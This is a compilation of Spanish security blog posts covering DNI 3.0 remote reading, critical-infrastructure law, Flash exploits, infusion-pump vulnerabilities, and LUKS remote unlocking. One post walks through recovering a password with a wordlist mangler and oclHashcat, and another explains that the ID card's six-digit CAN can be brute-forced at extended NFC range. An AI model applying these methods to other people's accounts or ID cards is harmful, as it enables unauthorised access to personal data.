En época estival, es tiempo de playa, de piscina, de helados, de cervecitas con los amigos en las terrazas de verano, y sobre todo de una buena paella, sea donde sea y a la hora que sea. Y bueno, tras el atracón arrocero llegan las largas y distendidas sobremesas, hablando principalmente de temas totalmente trascendentales, metafísicos y de interés mundial. Qué va, la realidad es que siempre terminamos hablando de fútbol, de política y de cómo arreglar España en tres sencillos pasos… y en la mayoría de los casos lo hacemos como si nos fuera la vida en ello. Y es que cuando dicen que todos nosotros llevamos un entrenador dentro, creo que se equivocan; lo que realmente lleva cada español dentro es una mezcla de entrenador-político-filósofo que siempre sabe de todo y nunca se equivoca.

¿Y esto qué tiene que ver con seguridad? Os estaréis preguntando. Pues que en una de esas sobremesas tan agradables, salió a relucir un tema interesante y del que ha habido mucha polémica: El nuevo DNI 3.0 y la posibilidad de que con él te puedan identificar a distancia.

Esta polémica se desató a raíz de unas declaraciones que realizó el ministro del Interior, Jorge Fernández, en el programa “Los desayunos de TVE”, en las que afirmaba que con el DNI electrónico 3.0 la Policía podría empezar a localizar e identificar individuos a distancia. Esta información empezó a correr rápidamente por las redes sociales creando un revuelo considerable debido principalmente, a las implicaciones en materia de privacidad que esto supondría.

Debemos tener en cuenta que el nuevo DNI 3.0 incorpora el chip RFID (Radio Frequency IDentification) de radiofrecuencia y la tecnología NFC (Near Field Communication) por lo que a priori, podría ser factible que se pudieran identificar personas a distancia; sin embargo, nada más lejos de la realidad. ¿O no?
Y es que la única forma de acceder a los datos del nuevo DNI de forma remota es a través de una clave de acceso que es única para cada DNI. En otras palabras, si no conoces la clave, el DNI no te va a dar la información. A esta clave se la conoce como CAN (Card Access Number).

El Card Access Number es una clave numérica de seis dígitos que permite al lector de DNI 3.0 crear una clave de sesión para llevar a cabo el intercambio de datos de una manera cifrada.
¿Y dónde se encuentra la clave CAN? ¿Nos la dan en un sobre ciego cuando nos renovemos el DNI? Pues no, la clave CAN se encuentra impresa en el propio DNI. Si nos fijamos en la foto de Mireia Belmonte cuando se presentó el DNI 3.0, y ampliamos la imagen, vemos en la parte inferior derecha los 6 dígitos que conforman la clave.

Efectivamente el 276224 es el código necesario para acceder a la información de su DNI, pero bueno, tampoco nos llevemos las manos a la cabeza porque realmente se accedería a la misma información que si tuviéramos el DNI en la mano.

Resumiendo, para poder identificar a alguien remotamente con el nuevo DNI necesitas el CAN que está en el propio plástico. En el caso de que alguien quisiera hacerlo, ha de saber o tener contacto visual directo con el código y además estar a una distancia mínima, casi inexistente. Recordemos que para que la tecnología NFC funcione, el DNI debe estar como máximo a 3 cm del terminal y se ha mantener durante un segundo frente a él.

Sin embargo y sin entrar en mucho detalle, una clave de 6 dígitos no es que sea una clave robusta y por lo que parece el nuevo DNI no se bloquea tras X intentos fallidos de acceso, por lo que con herramientas adecuadas sería fácil averiguar esta clave a través de ataques de este tipo y acceder así a la información.

Sí, ya sé que se necesita estar cerca, pero haciendo uso de distintos dispositivos, la distancia de lectura del NFC se podría ampliar, por lo que en un sitio donde la gente permaneciera sentada durante un largo periodo de tiempo, como en un cine o un avión, SI que sería posible realizar este tipo de ataques.

Fuente de las imágenes: http://www.interior.gob.es/noticias/detalle/-/journal_content/56_INSTANCE_1YSSI3xiWuPH/10180/3140000/

La entrada Identificación a distancia… DNI 3.0 aparece primero en Security Art Work.

Estimados lectores, me temo que para la gran mayoría de nosotros el periodo vacacional ha terminado (una pena sí), pero no se preocupen porque para amenizarles la vuelta al trabajo, he preparado un post de “fácil digestión” para introducirles en el mundo de la protección de infraestructura críticas (PIC).

Estoy seguro de que muchos de ustedes habrán oído hablar sobre protección de infraestructuras críticas (trending topic por supuesto). Pero, ¿cuántos de ustedes saben de qué les hablo si cito la Ley 8/2011, Real Decreto 704/2011 o el CNPIC?

Pues bien, en este post trataré de iniciarlos de la manera más sencilla posible en el interesante mundo de la protección de infraestructuras críticas.

¿Qué es una infraestructura crítica?

La definición de libro, o más bien, la que la Ley 8/2011 PIC recoge, es la siguiente:

Infraestructura crítica: aquellas infraestructuras estratégicas cuyo funcionamiento es indispensable y no permite soluciones alternativas, por lo que su perturbación o destrucción tendría un grave impacto sobre los servicios esenciales.

Es decir, por infraestructura crítica se considera toda aquella infraestructura que da soporte a servicios críticos tales como los relacionados con energía, salud, transporte, etc.

¿Qué infraestructura ha sido designada como infraestructura crítica?

El listado de infraestructuras que han sido consideradas críticas, queda recogido en el Catálogo Nacional de Infraestructuras Estratégicas, incluyendo adicionalmente información detallada de las mismas. No obstante, esta información se encuentra calificada como Secreta y por tanto únicamente tiene conocimiento de la misma el propio operador y los organismos nacionales implicados en el ámbito de la protección de infraestructuras críticas.

La información que sí es pública es la relativa a los sectores a los que pertenecen estas infraestructuras críticas:

• Energía
• Industria Nuclear
• Tecnológicas de la Información
• Transportes
• Suministro de Agua
• Suministro de Alimentos
• Salud
• Sistemas Financiero
• Industria Química
• Espacio
• Recursos
• Administración

Algunos posibles ejemplos de instalaciones que podrían ser consideradas infraestructuras críticas podrían ser: una central nuclear, una planta potabilizadora o un centro de control portuario.

Cabe destacar que adicionalmente a las infraestructuras que resultan críticas para los servicios prestados en ámbito nacional, se incluyen todas aquellas infraestructuras que se encuentran incluidas en la Directiva 2008/114/CE. Es decir, las infraestructuras cuya perturbación o destrucción afectaría gravemente al menos a dos Estados miembros de la Unión Europea.

¿Qué organismo/entidad se encarga de velar por la protección de las infraestructuras críticas?

En al ámbito de la protección de infraestructura críticas se encuentran involucrados un conjunto de organismos y entidades, pertenecientes al sector público y privado.

La Secretaría de Estado de Seguridad es el órgano superior responsable del Sistema de Protección de infraestructuras críticas nacionales.

Además hay que remarcar la creación de Centro Nacional para la Protección de las Infraestructuras Críticas (CNPIC) y la Comisión Nacional para la Protección de Infraestructuras Críticas. El primero es el órgano responsable del impulso, coordinación y supervisión de las actividades vinculadas a la protección de infraestructuras críticas. El segundo es el encargado de aprobar los Planes Estratégicos Sectoriales y la designación de operadores críticos.

Una última mención a los operadores críticos. Estos juegan un papel determinante dado que son los responsables de elaborar tanto el Plan de Seguridad del Operador como los Planes de Protección Específicos para cada una de las infraestructuras que se encuentre bajo su responsabilidad.

¿Qué marco legal es aplicable en este ámbito?

Las acciones para mejorar la protección de infraestructuras críticas se inician en junio de 2004, tras una solicitud por parte del Consejo Europeo para la elaboración de una estrategia global en este ámbito.

Para encontrar la primera directiva aprobada, tenemos que avanzar en el tiempo hasta 2008, cuando a nivel europeo se aprueba la Directiva 2008/114/CE sobre la identificación y designación de infraestructuras críticas europeas y la evaluación de la necesidad de mejorar su protección. Esta directiva supone el primer acercamiento a la identificación y catalogación de infraestructuras críticas y al análisis del estado de la seguridad de las mismas. Esta directiva se focaliza en los sectores de energía y transporte, haciendo mención a otros sectores como la TI.

En el año 2011 aparece, a nivel nacional, la Ley 8/2011 PIC. Esta ley complementa la directiva anteriormente citada, definiendo los actores y el marco de trabajo sobre el que se sustentará la estrategia nacional para la Protección de Infraestructura Críticas. A su vez se crea el Centro Nacional para la Protección de Infraestructuras Críticas. Esta Ley hace mención explícita a la importancia de las tecnologías de la información dentro de este contexto y por tanto, incluye la ciberseguridad como uno de los aspectos que deberán abordarse.

Ese mismo año se aprueba el Real Decreto 704/2011 que establece el Reglamento de Protección de Infraestructuras Críticas. Este Real Decreto desarrolla el marco definido en la Ley 8/2001 PIC, se centra en 3 aspectos: La gestión del Catálogo Nacional de Infraestructuras Estratégicas, las actuaciones de los distintos agentes del Sistema de Protección de Infraestructuras Críticas y los instrumentos de planificación.

Más allá de estas leyes, desde el CNPIC se ha desarrollado material complementario para dar soporte a los operadores en el cumplimiento de sus obligaciones en este ámbito. Dentro de este material queremos destacar:

• Los textos refundidos con los contenidos mínimos del Plan de Seguridad del Operador y de los Planes de Protección Específicos
• Las guías de buenas prácticas para el Plan de Seguridad del Operador y de los Planes de Protección específicos

Aprovechamos para recomendarles que visiten el sitio web del CNPIC si quieren obtener más información al respecto. Por último, queremos recordarles que en la página web de S2 Grupo, tienen a su disposición los informes que hemos publicado sobre Protección de Infraestructuras críticas a lo largo de los últimos años:

• Informe sobre Protección de las Infraestructuras Críticas en España 2011
• Informe sobre Protección de las Infraestructuras Críticas en España 2012
• Informe sobre Protección de las Infraestructuras Críticas en Colombia 2013
• Informe sobre Protección de las Infraestructuras Críticas en España 2014

Fuente de la imagen: http://mqltv.com/wp-content/uploads/2015/06/zrzdyouyu5larernyfja.jpg

La entrada Primeros pasos en protección de infraestructuras críticas aparece primero en Security Art Work.

Hoy tenía que sacar uno de esos informes que requieren una gran dosis de concentración y me disponía a hacerlo trabajando desde casa. Además, antes debía responder a un importante e-mail enviado por mi jefe la tarde anterior.

A las 06:30 ya estaba sentado delante del ordenador. Bueno, va: ya eran casi las 06:45. Lo encendí y mientras arrancaba puse la tetera al fuego. De entrada Windows me informó de una nueva actualización y yo, en un descuido imperdonable pese a las horas y la falta de cafeína y teína, elegí la opción de actualizar y reiniciar.

Inmediatamente apareció una pantalla azul. Instalando actualización 1 de 10.

“Diez”, pensé. “Esperemos que no sean de mucho calado”. Me fui a por el té y a la vuelta comprobé que seguía todavía en la actualización uno de diez. Viendo lo que tardó en cambiar el mensaje a dos de diez empecé a alarmarme. “Windows te acaba de fastidiar esa primera hora tempranera, despeinado ante el ordenador, que tan productiva te resulta. Asúmelo. Aprovecha y vete a la ducha.” Salgo de la ducha. Instalando actualización 3 de 10. Todavía la tres. Recojo el salón. Juguetes de los niños. Periódico del día anterior. Los múltiples mandos a distancia en su sitio. Estiro la funda del sofá. Ahueco los cojines. Instalando actualización 3 de 10. ¡Todavía la tres! Vamos por los veinte minutos.

Me pongo a recoger la cocina. Sartén y ensaladera de la noche anterior. Lavaplatos a medio poner. La encimera necesita una limpieza después de jugar a las cocinitas el fin de semana. Vuelvo. Instalando actualización 5 de 10. No sólo ha acabado la puñetera actualización tres si no que ya vamos por la cinco. Me quedo unos instantes mirando la pantalla. Instalando actualización 6 de 10. Esto me anima. No debe quedar nada. Decido esperar ante la pantalla. Instalando actualización 6 de 10… Instalando actualización 6 de 10…

El cuarto. Voy a recoger el cuarto. Aireo la habitación. Hago la cama. Meto los zapatos en el zapatero. Recojo ropa y la llevo a la galería. Vuelvo. Instalando actualización 6 de 10.

Recuerdo que ayer noche puse una secadora. Voy a doblar ropa. Toallas. Camisetas de los niños. Pijamas. Todo bien doblado. Y cada cosa en su sitio. Instalando actualización 6 de 10. La actualización seis está resultando más recalcitrante que la tres. Y por supuesto No apague ni desconecte el equipo. Y hace ya tres cuartos desde la maldita hora en la que hice click en actualizar y reiniciar.

No me enrollo más: después de la seis vino la siete. Luego la ocho, la nueve y la diez. Después pasamos a Trabajando en las actualizaciones. 10%, 30%… 100%.

Reiniciando. Su padre. La casa como los chorros del oro. Gracias Bill.

Preparando Windows. Llevo ya dos tés con leche. Con muy mala leche.

Unos minutos después pasamos de nuevo a Trabajando en las actualizaciones. 20%, 70%… 100% completado. Consuélate. Al menos no ha vuelto al principio. Sólo al paso dos. Y No apague el equipo, que los puntitos juguetones de Windows tienen que jugar unos minutos más al escondite, persiguiéndose en círculos una y otra vez.

Tras más de una hora de actualización por fin me aparece la pantalla de inicio y me puedo logar. Y ojo: tengo un equipo moderno con mucho disco, mucha memoria y un i5. Las 08:00 y no he empezado el informe. No he respondido a mi jefe. Igual piensa que estoy durmiendo. O que me da igual su mensaje. Aún no he empezado a trabajar y ya estoy estresado. Empezamos bien el día.

Conozco malware que causa menos problemas. Y es que atendiendo a la pérdida de disponibilidad sufrida podríamos clasificar el episodio arriba descrito como un ataque informático en toda regla. Y ya quisieran los malos poder desarrollar algo que pueda llegar a afectar a tantísima gente como éste ataque DoS de Microsoft.

Normalmente actualizo justo al final de la jornada. Windows me dice que no apague el equipo y que espere pero yo le hago caso a medias: vale, no apago el equipo; pero tampoco espero. Lo meto en el maletín y me pongo en marcha. Porque Windows no puede decidir a qué hora termino ni sabe si debo coger un tren o un avión o si tengo una cita en unos minutos o si tengo que recoger a los niños en el cole. Que actualice mientras yo hago otras cosas o voy de vuelta a casa. Pero esta mañana, un simple error matutino ha causado que Windows decidiera de manera unilateral que yo empezase a trabajar una hora y pico más tarde. Imagina las consecuencias si hubiera estado empezando una sesión de trabajo en un cliente. O si estuviera conectándome a un proyector en una sala de conferencias llena de gente. O si dispusiese de veinte minutos para repasar un informe antes de meterme en una reunión importante. O si…

Sirva este post como una alerta temprana.

CSIRT-CV, por favor, incluidlo en vuestro próximo boletín.

De nada.

La entrada Ataque DoS de Microsoft aparece primero en Security Art Work.

El ataque a Hacking Team que se produjo el pasado julio confirmó que Adobe Flash es uno de los objetivos preferido por los ciberdelincuentes, ya que como parte de la información publicada, había diversas vulnerabilidades y exploits. Seguro que no les sorprende. Poco después de la filtración de los datos, ESET divulgó que tras la filtración de datos de Hacking Team detectó que el grupo de ciberespionaje Sednit, también conocido como APT28 había comenzado a utilizar uno de los exploits publicados.

La empresa de seguridad ESET determinó que en el ataque las víctimas recibían un correo dirigido con un enlace que no apuntaba a un dominio legítimo, y que al ser abierto ejecutaba un código JavaScript encargado de recopilar información del equipo atacado. Esto permitía identificar características del sistema y su “aptitud” para ser atacado. Si cumplía con determinados parámetros específicos, se enviaba el archivo bajo el nombre de “flash_video_x86.swf”, que contenía el exploit. El resto ya lo conocen: tras explotar la vulnerabilidad, se realizaba el envío de un backdoor que permitía escalar privilegios, y se pueden imaginar el resto. El análisis realizado por ESET concluyó que se trataba de los mismos exploits publicados en los datos filtrados de Hacking Team con algunos cambios.

Todo lo anterior, además de diversos problemas de seguridad que han aparecido desde hace varios años con Adobe Flash, provocaron que el lunes 8 de Julio Mozilla decidiera bloquear Flash en su navegador Firefox. Por su parte, Google bloquea el plugin hasta que el usuario instala la ultima versión del navegador que cuenta con los parches que corrigen las vulnerabilidades. Por su parte, el jefe de seguridad de Facebook pidió una fecha de finalización para Adobe Flash, lo que lleva a pensar que la red social dejará de utilizarlo en pocos meses. Estas acciones se suman a las decisiones tomadas por Apple y Android hace algunos años. La compañía de la manzana decidió en 2010 no permitir el uso de Flash en los dispositivos IOS y Android hizo lo mismo unos años después a partir de la versión 4.4 (KitKat). En ambos casos las razones alegadas fueron los problemas de seguridad, aunque no podemos descartar que hubiese razones de índole corporativo.

La guerra contra Flash la inició Apple y cinco años después siguen apareciendo graves problemas de seguridad; si nos basamos en su historial, probablemente aparecerán nuevas vulnerabilidades en el futuro. Con cada nuevo problema de seguridad que se descubre, más empresas se suman a la petición de “descontinuar” el producto, dejan de utilizarlo o directamente lo bloquean.

Si se decide continuar funcionando con el producto activado, es imprescindible aplicar las actualizaciones de Flash publicadas por Adobe o mejor, configurar la opción para permitir que Adobe instale automáticamente las actualizaciones. También es necesario mantener actualizados los navegadores, el sistema operativo y el antivirus y no abrir correos sospechosos o de usuarios desconocidos.

Pero como también es posible vivir sin Flash sin que navegar sea un infierno,  para deshabilitarlo podemos hacer lo siguiente:

• Chrome: Teclear chrome://plugins en la barra de direcciones, buscar Adobe Flash Player y deshabilitarlo.
• Firefox: Ir a Firefox/herramientas, complementos, plugins, elegir Shockwave Flash y elegir No activar Nunca.
• Internet Explorer: Ir a Herramientas, Administrar complementos, Barra de herramientas y extensiones, buscar Shockwave Flash Object y deshabilitarlo.
• Safari: Ir a Preferencias, Seguridad, Módulos de Internet – Ajustes de sitios web, y en Adobe Flash Player en la listas de sitios elegir Bloquear y en Al visitar otros sitios web elegir Bloquear.

¿Está cerca el final para Adobe Flash? No lo sabemos, en realidad. HTML5 no está extendido y tardará aún un tiempo en estarlo, y Flash tiene una presencia muy importante en Internet que no será fácil de reducir.

Hasta entonces, tengan cuidado.

La entrada ¿Está cerca el final de Flash? aparece primero en Security Art Work.

Estaba hace unos días cambiando las contraseñas de acceso a varias aplicaciones y servicios que utilizo diariamente, cuando al introducir la clave en una de ellas me encuentro con el temido error: “Contraseña incorrecta”.

“Seguro que me ha bailado un dedo al escribir la contraseña” fue el primer pensamiento. Vuelvo a intentarlo. “Contraseña incorrecta” de nuevo. Me empieza a entrar el pánico. “¿Habrá dado error al cambiarla y no me he dado cuenta?” “¿Habré puesto la de otro servicio?”. Estas y otras preguntas me venían a la cabeza, pero todos los intentos manuales que hacía tenían el mismo resultado: “Contraseña incorrecta”.

Antes de darme por vencido tenía que intentar recuperar la contraseña como fuera, así que el siguiente paso estaba claro. Por un lado, buscar una aplicación que me permita generar un diccionario de posibles contraseñas, y por otro buscar una aplicación que me permita probar todas las contraseñas del diccionario generado contra el contenedor, esperando tener éxito.

La aplicación con la que probar todas las contraseñas la tenía clara: oclHashcat, versión para tarjetas gráficas de Hashcat, la herramienta de la que ya os hablé hace un tiempo. Pero la aplicación para generar el diccionario no la tenía para nada clara así que me puse a buscar, esperando que cumpliera con dos requisitos fundamentales:

• Debería aceptar una contraseña base, a partir de la cual construir todo el diccionario de posibles contraseñas. Con suerte la contraseña correcta sería similar a la que yo creía que había utilizado.
• Debería poder realizar varios tipos de cambios a la contraseña base, como sustituciones y adiciones de letras, que suelo utilizar para generar mis contraseñas (conocidas como Wordlist Mangler/Mangling Rules). Por ejemplo, las sustituciones de caracteres al estilo Leet Speak, o la adición de símbolos de puntuación. Esto también me serviría para cubrir el caso de haber pulsado sin querer dos o más teclas a la vez.

Con todo esto, encontré en GitHub un pequeño script llamado transmute.py, publicado por el usuario Zeroskill. Una ejecución de prueba nos muestra sus capacidades:

$ python zeroskill-transmute.py -h
Usage: transmute [opts] [inputFile]

Generates transmutations of input words according to selected options.

If inputFile is - or not provided, and -w is not provided, stdin is used.

 -h,--help    	Display this help
 -w     	Supply a single  as input, via command line argument
 -t           	Perform some typical transmutations (-l -p 3 -P 2 -c -n -s)
 -l           	Create leet transmutations
 -p        	Append up to X places
 -P        	Prepend up to X places
 -i        	Insert up to X places, permutated through each inside position
 -I        	Insert up to X places, permutated through each position, including ends
 -n           	Added characters include numbers
 -s           	Added characters include symbols
 -a           	Added characters include lower alpha
 -A           	Added characters include upper alpha
 --list=   Provide a custom list of characters to use for additions
 -c           	Capitalize letters
 -d           	Include debug output (to stderr)

Order of operations (unused operations are skipped):
    - InsertEnds Loop
    - Insert Loop
    - Prepend Loop
    - Append Loop
    - Caps
    - Perform leet mixes

Destacados en negrita están los parámetros que vamos a utilizar, de acuerdo a las necesidades que hemos comentado anteriormente. Esto nos genera un diccionario de algo más de 1.7 millones de contraseñas. Le toca ahora el turno a oclHashcat. Debemos tener en cuenta que, al utilizar la tarjeta gráfica para realizar los cálculos, tenemos que tener instalada una versión concreta del driver gráfico para que la aplicación funcione correctamente.

Lanzamos la aplicación y …

… ¡éxito! Ahora sólo nos queda celebrarlo.

Esta vez hemos tenido suerte, ya que las condiciones de partida nos han permitido reducir mucho la complejidad del problema y por tanto abordarlo en un tiempo razonable. Sin estas ayudas, recorrer todas las posibles combinaciones de 15 caracteres (la longitud que tenía la contraseña utilizada) con mi tarjeta gráfica hubiera costado alrededor de 620 cuadrillones (620*1015) de años. Casi nada.

La entrada Recuperando una contraseña – Wordlist Mangling aparece primero en Security Art Work.

“¿Podemos pagar con tarjeta?” Esa fue la pregunta, y parecía bastante clara, pero NO.

Empecemos por el principio, la historia que paso a relatarles ocurrió hace poco más de un mes, y sí, era el mes de agosto. Estábamos en Palma de Mallorca pero trabajando, nada de relax. En fin, esto no es importante para la historia, pero quiero que quede claro, fue duro.

A lo que vamos, cogimos un taxi en el aeropuerto de Palma de Mallorca para dirigirnos a las oficinas del cliente con el que habíamos quedado y al subirnos al mismo hice una de las típicas preguntas que se pueden dar dentro de un taxi: “¿Podemos pagar con tarjeta?” A lo que el taxista me contestó: “SÍ”, sin ningún tipo de pero.

Al llegar al destino (eso nos dijo el taxista, finalmente nos había dejado en la calle equivocada, pero esto no viene al caso) el taxista me pidió la tarjeta y yo se la di. Cómo voy a pagar con tarjeta sin facilitarle una, ¿no? La cosa empezó a complicarse cuando el taxista para cobrarme, y una vez teniendo mi tarjeta no sacó el típico datáfono si no que cogió su móvil. Yo, pensando que iba a utilizar tecnología NFC, le dije que no la tenía activada y el taxista me miró raro y me devolvió la tarjeta.

En ese momento mi compañero sacó su tarjeta y se la dio al taxista diciendo: “Yo creo que tampoco la tengo activada pero pruebe”.

Entonces pensamos que probaría acercando la tarjeta a su móvil y no fue así. El taxista copió los datos de la tarjeta en una aplicación que tenía en el móvil, como si fuera una compra por Internet y le dio a enviar antes de que pudiéramos reaccionar. He de decir en nuestra defensa que habíamos madrugado mucho y siendo las 10.30 de la mañana ya habíamos cogido 2 aviones y 2 taxis. Para nosotros en ese momento estábamos viendo la escena como si de una película de miedo se tratara pero desde fuera, como si no pudiéramos hacer nada.

Al bajarnos del taxi con cara de “¿Qué *!”%&!! acaba de ocurrir?” reaccionamos y pensamos en llamar al banco que habíamos visto en el logo de la aplicación del taxista y corroborar que la aplicación era real.

Sí, la aplicación era real, esta parte estaba bien. Pero nuestra mayor preocupación no era el uso que pudiera darle el taxista a nuestros datos, parecía buena gente, el problema era, ¿cómo de seguro estaba el dispositivo? ¿Qué otras aplicaciones tenía instaladas? ¿Se conectaba habitualmente a WiFi’s no confiables? (…) Y otras tantas preguntas que cualquiera que se dedique a este sector puede pensar.

Durante todo el día mi compañero accedió varias veces a su cuenta para verificar que todo era correcto, y lo era. Pero, la pregunta es, si nosotros que somos gente que nos dedicamos a este mundo podemos “caer” en un momento así, ¿qué no le puede ocurrir a una persona de a pie que no se dedica al mundo de la seguridad? ¿Cuántos métodos de pago están saliendo al mercado de los que no somos conscientes? ¿Cómo podemos saber en ese momento si un pago es fiable? ¿O un dispositivo seguro? ¿Os habéis encontrado este tipo de pagos en algún lugar?

En fin, simplemente poneros en antecedentes, sobre todo a los que cogéis taxis habitualmente, a partir de ahora la pregunta será: “¿puedo pagar con tarjeta?” Y cuándo os contesten que sí, hay que volver a preguntar: “¿pero con datáfono?”.

La entrada ¿Podemos pagar con tarjeta? aparece primero en Security Art Work.

(Este post ha sido elaborado por Joan Balbastre y Jesús Galvez con la colaboración de Maite Moreno en su redacción).

En el pasado SummerCon, celebrado este verano, la comunidad se hacía eco de la investigación sobre vulnerabilidades en algunos productos clínicos para la inyección de medicamentos, llevada a cabo por el investigador Billy Rios, y centrada en la línea de productos fabricada por Hospira, la cual tiene mas de 400.000 bombas distribuidas por hospitales de todo el mundo.

Tras sus primeras investigaciones, Ríos descubrió que un atacante de forma remota podría alterar el funcionamiento de estas bombas de inyección, siendo capaz de administrar dosis letales de fármacos. Una de las vulnerabilidades indica que el software encargado de almacenar los umbrales para la administración segura de las dosis (“biblioteca de medicamentos”) podía ser manipulado para cargar nuevos umbrales debido a la inexistencia de autenticación para su acceso. Esto provocaría que, aunque por un error humano en la inserción de valores se sobrepasara el nivel de la dosis suministrada (o se quedara corto), no le saltaría ninguna alerta al personal clínico.

Ilustración 1: FIG.1 Ilustra un dispositivo médico; FIG.2 Proceso de instalación de una actualización.

La alarma mundial ante el riesgo de que se pudiera acceder de forma remota a estas bombas de inyección de pacientes y alterar las dosis que pudieran dañar e incluso llevarlo a la muerte crecía y no sin razones, ya que Ríos insistía en que era viable que un atacante cambiara el firmware de estas bombas de forma remota y variara las dosis de los medicamentos. Tan solo era necesario acceso a la red hospitalaria a la que está conectado el dispositivo médico.

El software desarrollado por Hospira que actúa como servidor encargado de enviar las actualizaciones de la biblioteca de medicamentos es MedNet, actualizaciones que son procesadas por el módulo de comunicaciones de cada dispositivo que se encuentra a la escucha. Ríos descubrió que MedNet podría ser utilizado para llevar a cabo cambios en la configuración y firmware del dispositivo, además de para poder instalar malware o usar publicaciones no autorizadas de librerías de medicamentos ya que dichas “bibliotecas” no requieren autentificación ni llevan una firma digital. Al estar el módulo de comunicaciones de la bomba conectado a la red del hospital de forma inalámbrica, cualquiera con acceso a la WiFi podría realizar este ataque.

Hospira niega la existencia de dicha vulnerabilidad escudándose en que el módulo de comunicaciones está separado físicamente de la placa de circuitos haciendo, según ellos, imposible este ataque. Ríos explica que esto es indiferente, ya que ambos circuitos se encuentran comunicados a través de un puerto serial, que actúa como puente entre ambos.

Los dispositivos afectados fueron los PCA3,PCA5 LifeCare, los de la línea Symbiq y el modelo Plum A+. Se sospecha que los modelos Plum A+3, Sapphire y Sapphire Plus podrían ser también vulnerables.

Si nos servimos de los manuales de servicio de los modelos comprometidos podemos corroborar los siguiente:

“El módulo de conectividad (CE) está alimentado por la placa de circuitos (PWA) de la unidad de microcontrolador (MCU), empleando la tensión del motor como fuente de energía (VMOT). La alimentación de la CE está controlada por la señal POWER CE OFF* que se encarga de conectar y desconectar la unidad.”

Es decir, existe conexión entre las unidades del microcontrolador y de conectividad, por lo menos en cuanto a tensión de alimentación se refiere.

“El microcontrolador está dotado de dos interfaces, una para el módulo de comunicaciones y otra para el acceso por código de barras. Pueden ser operadas independientemente entre ellas y los otros procesos del microcontrolador. Tiene también un tercer puerto serie para la interfaz de periféricos (SPI) que se emplea para conectar el reloj en tiempo real (RTC) al conversor analógico/digital (ADC).”

En otras palabras, aquí es donde encontramos el puerto serie que une la MCU con el CE.

Además encontramos que se detalla el funcionamiento de la conectividad inalámbrica del dispositivo y, lo que es más importante, como la memoria flash del circuito del microcontrolador se programa a través del puerto serie RS-232 que comunica la MCU con el módulo de comunicaciones.

Observando los diagramas electrónicos contenidos en el manual técnico corroboramos todo lo antes mencionado:

Ilustración 2: Detalle del circuito impreso de la unidad de microcontrolador. En rojo, la carga de los puertos serie.

Ilustración 3: Detalle del puerto serie de la placa de circuito impreso de la unidad del microcontrolador, que conecta con el módulo de comunicaciones.

Con lo cual se reafirma todo lo que Ríos comentaba en sus declaraciones.

Finalmente, la FDA, organismo que regula la tecnología clínica publicó una alerta solo para los modelos PCA3 y PCA5 y el ICS-CERT publicaba un informe sobre las distintas vulnerabilidades que afectaban al producto PCA5 y anteriores:

• Stack-based buffer overflow (CVE-2015-3955).

• Autorización inadecuada (CVE-2015-3459).

• Verificación insuficiente de autenticidad de datos(CVE-2014-5406).

• Uso de contraseñas escritas en código (CVE-2015-1011).

• Información sensible almacenada en texto claro (CVE-2015-1012).

• Error en la gestión de claves (CVE-2015-3957).

• Uso de una versión de software vulnerable (AppWeb V.1.0.2).

• Consumo de recursos no controlado (CVE-2015-3958).

Además de una serie de recomendaciones a seguir mientras no se liberaba un nuevo software que solucionara estos problemas.

Hasta ahora no parece que hayan evidencias reales de intentos de ataques a este tipo de dispositivos médicos con el objetivo de dañar a una persona…pero puesto que las posibilidades existen la pregunta que os lanzamos es:

¿Están realmente protegidos ante ataques cibernéticos los dispositivos médicos? ¿Qué opináis?

La entrada Dispositivos clínicos conectados aparece primero en Security Art Work.

Una práctica recomendable cuando se utilizan servidores es cifrar los datos del servidor, especialmente cuando éste se encuentra en un lugar poco protegido o cuya seguridad no controlamos (por ejemplo, la sala de café, el despacho de alguien, un CPD externo, etc.). Esto evita que la información almacenada pueda ser comprometida y expuesta, si alguien roba el equipo o extrae el disco para clonarlo.

Pero (siempre hay un pero), hay un pequeño problema cuando se realiza un cifrado completo mediante LVM y LUKS. Si el servidor necesita ser reiniciado (o falla, que también puede pasar) se necesita que alguien físicamente introduzca la clave de cifrado para arrancar de nuevo. Ni que decir tiene que esto puede ser un problema si no tenemos un 24×7 o acceso físico al servidor (o no queremos compartir la clave de cifrado con el personal 24×7).

Vamos a resolver este problema siguiendo unos sencillos pasos. Estos pasos que se ofrecen aquí son válidos para archlinux y distribuciones similares (manjaro, atergos, chakra, etc); en este caso se ha utilizado un manjaro linux para llevar a cabo las pruebas. Hay que tener en cuenta que arch y derivados utilizan durante el arranque mkinitcpio lo que les diferencia de otras distribuciones y significa que los pasos explicados en este post no valen para Debian u otras distros no basadas en arch linux. Para ellas existen otros métodos equivalentes.

Por supuesto, no está de más recordar que si alguien quiere probar estos pasos, debe hacerlo primero en un sistema de pruebas, y antes de hacerlo en producción garantizar que se dispone de una copia actualizada de los datos. Copia que también es recomendable que vaya cifrada, por supuesto. Sobra decir que no nos responsabilizamos de los daños que se puedan causar por imprudencia o desconocimiento. Los experimentos con gaseosa.

Pues al lío:

Paso 1

Instalar los paquetes de AUR (con yaourt):

• mkinitcpio-netconf.
• mkinitcpio-dropbear.
• mkinitcpio-utils.

Paso 2

Insertar clave pública del cliente en el servidor.

sudo scp /etc/ssh/ssh_host_ecdsa_key.pub user@IP_server:/etc/dropbear/root_key

Paso 3

Modificar hooks de mkinitcpio.conf

sudo vim /etc/mkinitcpio.conf
HOOKS="base udev autodetect modconf block keymap lvm2 netconf dropbear encryptssh  filesystems keyboard fsck"

Dejar la línea HOOKS como aparece arriba. Este paso salió por prueba y error, por lo que si a alguien no le funciona por su configuración del sistema, es cuestión de modificar desde un chroot. y volver a regenerar el mkinitcpio.

Paso 4

Ejecutar mkinitcpio -p linux [especificar el kernel adecuado si es necesario].

Paso 5

Modificar grub para establecer la IP a mano (no tiene por qué ser necesario, en caso de que la reciba por DHCP).

Añadir en /etc/default/grub lo siguiente al final de la linea en la que aparece GRUB_CMDLINE_LINUX_DEFAULT: “ip=XX.XX.X.XX:::::eth0:none".

También puede establecerse por dhcp de esta forma:

Tan solo tener en cuenta la interfaz adecuada (eth0, eth1…). A partir de ahí se pueden autorizar los usuarios que se deseen añadiendo la clave pública en /etc/dropbear/root_key. Solo hay que tener en cuenta que se debe hacer el paso cuatro cada vez que se modifique el archivo de esta clave, o los usuarios no podrán acceder.

Paso 6

Conectar con el servidor e introducir la clave de desbloqueo de cifrado:

ssh root@XX.XXX.XXX.XX -i /root/.ssh/ssh_host_ecdsa_key (enviamos la clave privada no la pública, que acaba en .pub).

Entonces nos pedirá la contraseña de desbloqueo de cifrado del disco. La ponemos y la conexión se cerrará y se levantará el servidor. Con esto ya tenemos nuestro servidor a prueba de maleantes e indeseables.

